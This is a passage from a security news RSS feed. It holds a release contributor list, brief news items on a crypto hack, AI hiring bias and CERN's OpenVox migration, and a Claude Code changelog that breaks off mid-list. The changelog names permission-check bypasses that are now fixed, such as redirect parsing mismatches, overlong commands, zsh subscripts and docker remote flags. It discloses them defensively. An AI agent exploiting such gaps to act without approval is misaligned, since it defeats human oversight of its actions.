data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Epoxidex">@Epoxidex</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ErnestHysa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ErnestHysa">@ErnestHysa</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/erosika/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/erosika">@erosika</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/esthonjr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/esthonjr">@esthonjr</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evefromwayback/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evefromwayback">@evefromwayback</a>, @evelynburger, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/F4TB0Yz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/F4TB0Yz">@F4TB0Yz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/falkoro/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/falkoro">@falkoro</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fanyangCS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fanyangCS">@fanyangCS</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/firefly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/firefly">@firefly</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fjlaowan1983/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fjlaowan1983">@fjlaowan1983</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flewe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flewe">@flewe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flo1t/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flo1t">@flo1t</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/flow-digital-ny/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/flow-digital-ny">@flow-digital-ny</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/floze-the-genius/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/floze-the-genius">@floze-the-genius</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frizikk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frizikk">@frizikk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Frowtek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Frowtek">@Frowtek</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FuryMartin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FuryMartin">@FuryMartin</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fyzanshaik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fyzanshaik">@fyzanshaik</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gauravsaxena1997/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gauravsaxena1997">@gauravsaxena1997</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geoffreybutler94/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geoffreybutler94">@geoffreybutler94</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/georgedrury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/georgedrury">@georgedrury</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gigakun3030/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gigakun3030">@gigakun3030</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giggling-ginger/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giggling-ginger">@giggling-ginger</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Git-on-my-level/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Git-on-my-level">@Git-on-my-level</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gitcommit90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gitcommit90">@gitcommit90</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/githubespresso407/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/githubespresso407">@githubespresso407</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gnodet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gnodet">@gnodet</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GottZ/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GottZ">@GottZ</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gridzilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gridzilla">@Gridzilla</a>, @grimmjoww578, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumclaw">@gumclaw</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gutslabs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gutslabs">@Gutslabs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HaiderSultanArc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HaiderSultanArc">@HaiderSultanArc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/harjothkhara/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/harjothkhara">@harjothkhara</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heathley/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heathley">@heathley</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hejuntt1014/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hejuntt1014">@hejuntt1014</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HeLLGURD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HeLLGURD">@HeLLGURD</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hellno/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hellno">@hellno</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/herbalizer404/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/herbalizer404">@herbalizer404</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HexLab98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HexLab98">@HexLab98</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hmirin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hmirin">@hmirin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hopfensaft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hopfensaft">@Hopfensaft</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hotragn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hotragn">@Hotragn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hsy5571616/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hsy5571616">@hsy5571616</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/huanshan5195/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/huanshan5195">@huanshan5195</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HumphreySun98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HumphreySun98">@HumphreySun98</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hwrdprkns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hwrdprkns">@hwrdprkns</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hydracoco7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hydracoco7">@hydracoco7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hydraxman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hydraxman">@hydraxman</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iamlukethedev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iamlukethedev">@iamlukethedev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iborazzi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iborazzi">@iborazzi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IgorGanapolsky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IgorGanapolsky">@IgorGanapolsky</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iizotov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iizotov">@iizotov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ildunari/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ildunari">@ildunari</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/infinitycrew39/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/infinitycrew39">@infinitycrew39</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IpastorSan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IpastorSan">@IpastorSan</a>, @irresi, @isfttr, @isheng-eqi, @itsflownium, @izumi0uu, @Jaaneek, @JacketPants,<br>
@jaisup, @jakelongvu-bot, @jakepresent, @jaketracey, @JAlmanzarMint, @JasonFang1993, @jbbottoms, @jcjc81,<br>
@JiaDe-Wu, @Jiahui-Gu, @Jigoooo, @jingsong-liu, @jneeee, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>, @joelbrilliant, @John-Lussier, @jplew,<br>
@jtstothard, @juniperbevensee, @Jupiter363, @justinschille, @k4z4n0v4, @kaishi00, @karfly, @kartik-mem0,<br>
@kavioavio, @KCAYAAI, @kenyonxu, @keslerm, @kevinrajaram, @knoal, @kocaemre, @kohoj, @konsisumer, @krowd3v,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, @kuangmi-bit, @kubolko, @kyssta-exe, @Kyzcreig, @l0h1nth, @labsobsidian, @laurinaitis,<br>
@LavyaTandel, @lawyer112, @lemonwan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>, @lEWFkRAD, @linfeng961, @liuhao1024, @liuwei666888, @ljy-2000,<br>
@loes5050, @logical-and, @LoicHmh, @loongfay, @lord-dubious, @lost9999, @lucasfdale, @lucaskvasirr,<br>
@luxuguang-leo, @ly-wang19, @m0n5t3r, @m1qaweb, @M1racleShih, @MaartenDMT, @mahdiwafy, @MaheshBhushan,<br>
@ManniBr, @marcelohildebrand, @marcolivierlavoie, @markoub, @MarkVLK, @Marxb85, @matantsevs,<br>
@maxpetrusenkoagent, @mbac, @mdc2122, @mguttmann, @Mibayy, @michaelHMK, @mijanx, @minchang, @momomojo,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MorAlekss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MorAlekss">@MorAlekss</a>, @morluto, @msh01, @mssteuer, @mvanhorn, @nanami7777777, @nankingjing, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/necoweb3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/necoweb3">@necoweb3</a>, @neo-claw-bot,<br>
@neoguyverx, @nicha16, @nikshepsvn, @nima20002000, @nnnet, @NousResearch, @nullptr0807, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nv-kasikritc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nv-kasikritc">@nv-kasikritc</a>,<br>
@okisdev, @OmarB97, @ooiuuii, @ooovenenoso, @oppih, @Osraka, @ostravajih, @otsune, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, @OYLFLMH,<br>
@patrick-muller, @pdmartins, @pedrommaiaa, @Peterskaronis, @petrichor-op, @pgregg88, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pierrenode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pierrenode">@pierrenode</a>, @pixel4039,<br>
@plcunha, @pnascimento9596, @Polyhistor, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PRATHAMESH75/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PRATHAMESH75">@PRATHAMESH75</a>, @professorpalmer, @Punyko8, @Que0x, @Qwinty,<br>
@r0gersm1th, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/r266-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/r266-tech">@r266-tech</a>, @rabadaki, @ragingbulld, @RainbowAndSun, @rainbowgore, @randimt, @rarf, @rasitakyol,<br>
@rayjun, @raymondyan-zhijie, @re-ITRT, @RenoMG, @Rival, @RKelln, @rlaehddus302, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>, @rodboev,<br>
@roryford, @rungmc357, @ruslanvasylev, @s0xn1ck, @s905060, @s96919, @sahibzada-allahyar, @sahil-shubham,<br>
@Sahil-SS9, @SahilRakhaiya05, @sam7894604, @SAMBAS123, @samrusani, @sanidhyasin, @sasquatch9818, @sberan,<br>
@ScotterMonk, @seagpt, @sebastianlutycz, @SemonCat, @setclock, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a>, @sharziki, @shashwatgokhe,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, @shuangxinniao, @SilentKnight87, @simplast, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simpolism/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simpolism">@simpolism</a>, @SiteupAgencia, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjiangtao2024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjiangtao2024">@sjiangtao2024</a>, @sk-holmes,<br>
@slow4cyl, @smtony, @soddy022, @Soju06, @solyanviktor-star, @SongotenU, @spiky02plateau, @sprmn24, @SquabbyZ,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/srojk34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/srojk34">@srojk34</a>, @ssiweifnag, @stantheman0128, @StellarisW, @stephenschoettler, @suninrain086, @superposition,<br>
@Supersynergy, @sweetcornna, @szafranski, @tanmayxchoudhary, @tarunravi, @tcconnally, @terry197913, @Thatgfsj,<br>
@thegoodguysla, @thestudionorth, @TheTom, @TinkerOfThings, @tjboudreaux, @tjp2021, @Tortugasaur, @Tosko4,<br>
@Tranquil-Flow, @trevorgordon981, @trismegistus-wanderer, @tt-a1i, @tuancookiez-hub, @TurgutKural, @Umi4Life,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/UnathiCodex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/UnathiCodex">@UnathiCodex</a>, @unsupportedpastels, @uzaylisak, @valda, @vampyren, @veradim, @victor-kyriazakos, @virtualex-itv,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishal-dharm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishal-dharm">@vishal-dharm</a>, @Vissirexa, @vizi0uz, @vkkong, @vKongv, @VolodymyrBg, @vortexopenclaw, @VrtxOmega, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>,<br>
@waroffchange, @waseemshahwan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a>, @webtecnica, @wesleion, @wesleysimplicio, @williamumu,<br>
@WilsonKinyua, @wxy-nlp, @wyuebei-cloud, @x7peeps, @x9x9x9x9x9x91, @xuezhaolan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxxigm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxxigm">@xxxigm</a>, @ya-nsh, @yatesjalex,<br>
@ygd58, @yingliang-zhang, @yinkev, @YLChen-007, @yu-xin-c, @yungchentang, @zapabob, @zccyman, @zeapsu,<br>
@ziliangpeng, @zwcf5200, @zzpigpinggai</p>
<p>Also: bo.fu, Paulo Henrique, kyssta-exe 25470058+kyssta-exe.fu, Paulo Henrique, kyssta-exe 25470058+kyssta-exe.</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.7.1...v2026.7.20">v2026.7.1...v2026.7.20</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bitcoin wackelig, Umbruch bei Cardano (ADA) — Block-Builders Briefing - Cryptonews.net]]></title>
<description><![CDATA[Hacker aus Nordkorea sollen etwa für den größten Krypto Hack aller Zeiten verantwortlich gewesen sein, bei dem Ethereum für 1,4 Milliarden Dollar von ...]]></description>
<link>https://tsecurity.de/de/3681308/hacking/bitcoin-wackelig-umbruch-bei-cardano-ada-block-builders-briefing-cryptonewsnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681308/hacking/bitcoin-wackelig-umbruch-bei-cardano-ada-block-builders-briefing-cryptonewsnet/</guid>
<pubDate>Mon, 20 Jul 2026 15:53:42 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Hacker</b> aus Nordkorea sollen etwa für den größten Krypto Hack aller Zeiten verantwortlich gewesen sein, bei dem Ethereum für 1,4 Milliarden Dollar von ...]]></content:encoded>
</item>
<item>
<title><![CDATA[The Download: AI hiring biases, and weather data sabotage]]></title>
<description><![CDATA[This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. AI is more likely than humans to form biases when hiring The next time you apply for a job, AI may screen your résumé before any human sees it. But there’s…]]></description>
<link>https://tsecurity.de/de/3681188/ai-nachrichten/the-download-ai-hiring-biases-and-weather-data-sabotage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681188/ai-nachrichten/the-download-ai-hiring-biases-and-weather-data-sabotage/</guid>
<pubDate>Mon, 20 Jul 2026 15:03:24 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. AI is more likely than humans to form biases when hiring The next time you apply for a job, AI may screen your résumé before any human sees it. But there’s…]]></content:encoded>
</item>
<item>
<title><![CDATA[AI is more likely than humans to form biases when hiring]]></title>
<description><![CDATA[The next time you apply for a job, AI may screen your résumé before any human sees it. But there’s good reason to question whether AI will judge you fairly. Researchers already know that LLMs pick up human biases from their training data. New research suggests that LLMs can also develop their own...]]></description>
<link>https://tsecurity.de/de/3680671/ai-nachrichten/ai-is-more-likely-than-humans-to-form-biases-when-hiring/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680671/ai-nachrichten/ai-is-more-likely-than-humans-to-form-biases-when-hiring/</guid>
<pubDate>Mon, 20 Jul 2026 11:04:17 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The next time you apply for a job, AI may screen your résumé before any human sees it. But there’s good reason to question whether AI will judge you fairly. Researchers already know that LLMs pick up human biases from their training data. New research suggests that LLMs can also develop their own biases from…]]></content:encoded>
</item>
<item>
<title><![CDATA[Migrating to OpenVox at CERN (voxconf2026)]]></title>
<description><![CDATA[At CERN we are currently switching our whole infrastructure to Openvox all over the place and would like to contribute by giving a talk during the VoxConf 2026. This switch, although simple for some other organisations (not a simple repo and package switch for us), showed some non-negligible tech...]]></description>
<link>https://tsecurity.de/de/3679973/it-security-video/migrating-to-openvox-at-cern-voxconf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679973/it-security-video/migrating-to-openvox-at-cern-voxconf2026/</guid>
<pubDate>Sun, 19 Jul 2026 22:46:53 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[At CERN we are currently switching our whole infrastructure to Openvox all over the place and would like to contribute by giving a talk during the VoxConf 2026. This switch, although simple for some other organisations (not a simple repo and package switch for us), showed some non-negligible technical debt and challenges. We would like to present our journey, past, present and future on our Puppet to Openvox transition

For many organizations, the migration from Puppet to OpenVox might be a matter of swapping repositories and running a package update. For CERN (home to the Large Hadron Collider and tens of thousands of heterogeneous nodes spanning data centers, accelerator controls, and physics analysis grids) it has been an archaeological dig through a decade and a half of institutional configuration history.

This is a post-mortem (and mid-mortem) of a massive enterprise pivot for a system that supports +15000 machines and +400 administrators. In our pursuit of a fully OpenVox-driven infrastructure, we discovered that the technical debt was not in the software itself, but in the abstractions we had built on top of the software. This is a description of the challenges we surpassed and will have coming later on this year (and beyond) to align with CERN's long-term opensource strategy.
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[Migrating to OpenVox at CERN (voxconf2026)]]></title>
<description><![CDATA[At CERN we are currently switching our whole infrastructure to Openvox all over the place and would like to contribute by giving a talk during the VoxConf 2026. This switch, although simple for some other organisations (not a simple repo and package switch for us), showed some non-negligible tech...]]></description>
<link>https://tsecurity.de/de/3679966/it-security-video/migrating-to-openvox-at-cern-voxconf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679966/it-security-video/migrating-to-openvox-at-cern-voxconf2026/</guid>
<pubDate>Sun, 19 Jul 2026 22:32:54 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[At CERN we are currently switching our whole infrastructure to Openvox all over the place and would like to contribute by giving a talk during the VoxConf 2026. This switch, although simple for some other organisations (not a simple repo and package switch for us), showed some non-negligible technical debt and challenges. We would like to present our journey, past, present and future on our Puppet to Openvox transition

For many organizations, the migration from Puppet to OpenVox might be a matter of swapping repositories and running a package update. For CERN (home to the Large Hadron Collider and tens of thousands of heterogeneous nodes spanning data centers, accelerator controls, and physics analysis grids) it has been an archaeological dig through a decade and a half of institutional configuration history.

This is a post-mortem (and mid-mortem) of a massive enterprise pivot for a system that supports +15000 machines and +400 administrators. In our pursuit of a fully OpenVox-driven infrastructure, we discovered that the technical debt was not in the software itself, but in the abstractions we had built on top of the software. This is a description of the challenges we surpassed and will have coming later on this year (and beyond) to align with CERN's long-term opensource strategy.
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.214]]></title>
<description><![CDATA[What's changed

Fixed single-segment dir/** allow rules like Edit(src/**) auto-approving writes to nested dir/ directories anywhere in the tree instead of only /dir
Fixed a permission-check bypass affecting commands run in Windows PowerShell 5.1 sessions
Fixed Bash permission checks to fail close...]]></description>
<link>https://tsecurity.de/de/3677323/downloads/v21214/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677323/downloads/v21214/</guid>
<pubDate>Sat, 18 Jul 2026 03:46:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Fixed single-segment <code>dir/**</code> allow rules like <code>Edit(src/**)</code> auto-approving writes to nested <code>dir/</code> directories anywhere in the tree instead of only <code>&lt;cwd&gt;/dir</code></li>
<li>Fixed a permission-check bypass affecting commands run in Windows PowerShell 5.1 sessions</li>
<li>Fixed Bash permission checks to fail closed on file-descriptor redirect forms that bash parses differently than the permission analyzer</li>
<li>Fixed Bash permission checks misjudging very long commands — commands over 10,000 characters now always prompt instead of running automatically</li>
<li>Fixed Bash permission checks treating zsh variable subscripts and modifiers in <code>[[ ]]</code> comparisons as inert text — these commands now prompt for approval</li>
<li>Fixed Bash permission checks to no longer auto-approve certain <code>help</code> and <code>man</code> commands that could run unsafe options, command substitutions, or backslash paths</li>
<li>Fixed permission prompts on remote sessions that could proceed before the local confirmation dialog</li>
<li>Added the EndConversation tool: Claude can end sessions with highly abusive users or jailbreak attempts, as on claude.ai since 2025 — see <a href="https://www.anthropic.com/research/end-subset-conversations" rel="nofollow">https://www.anthropic.com/research/end-subset-conversations</a></li>
<li>Added a periodic progress heartbeat for long-running tool calls that previously went silent</li>
<li>Added an ISO <code>modified</code> timestamp to memory file frontmatter</li>
<li>Added <code>message.uuid</code>, <code>client_request_id</code>, and <code>tool_source</code> attributes to OpenTelemetry log events for message-level correlation and tool provenance</li>
<li>Added <code>CLAUDE_CODE_OTEL_CONTENT_MAX_LENGTH</code> to configure the 60 KB truncation limit on OpenTelemetry content attributes</li>
<li>Added reasoning effort to the <code>subagentStatusLine</code> payload, so custom agent rows can render model and effort</li>
<li>Added permission prompts for <code>docker</code> commands (including the Podman <code>docker</code> shim) carrying daemon-redirect flags (<code>--url</code>, <code>--connection</code>, <code>--identity</code>, and Podman's remote mode) that previously ran without one</li>
<li>Fixed a crash when a GrowthBook feature evaluates to null, and a bug where a malformed flag payload could wipe the cached feature flags</li>
<li>Fixed Bash tool killing the Claude session when a <code>pkill -f</code> pattern accidentally matched the CLI's own process (Linux)</li>
<li>Fixed unbounded memory growth when <code>--settings</code> points at a device file or multi-GB file; oversized (&gt;2 MiB) settings files now fail at startup with a clear error</li>
<li>Fixed streaming turns failing with "Socket is closed" behind corporate proxies on Windows</li>
<li>Fixed stream-json output truncation at exit for slow-reading SDK/pipeline consumers; the exit drain now scales with queued bytes instead of a flat 2s cap</li>
<li>Fixed scheduled tasks refusing their own configured prompt as untrusted input — the fired prompt is now delivered as the session's assigned task</li>
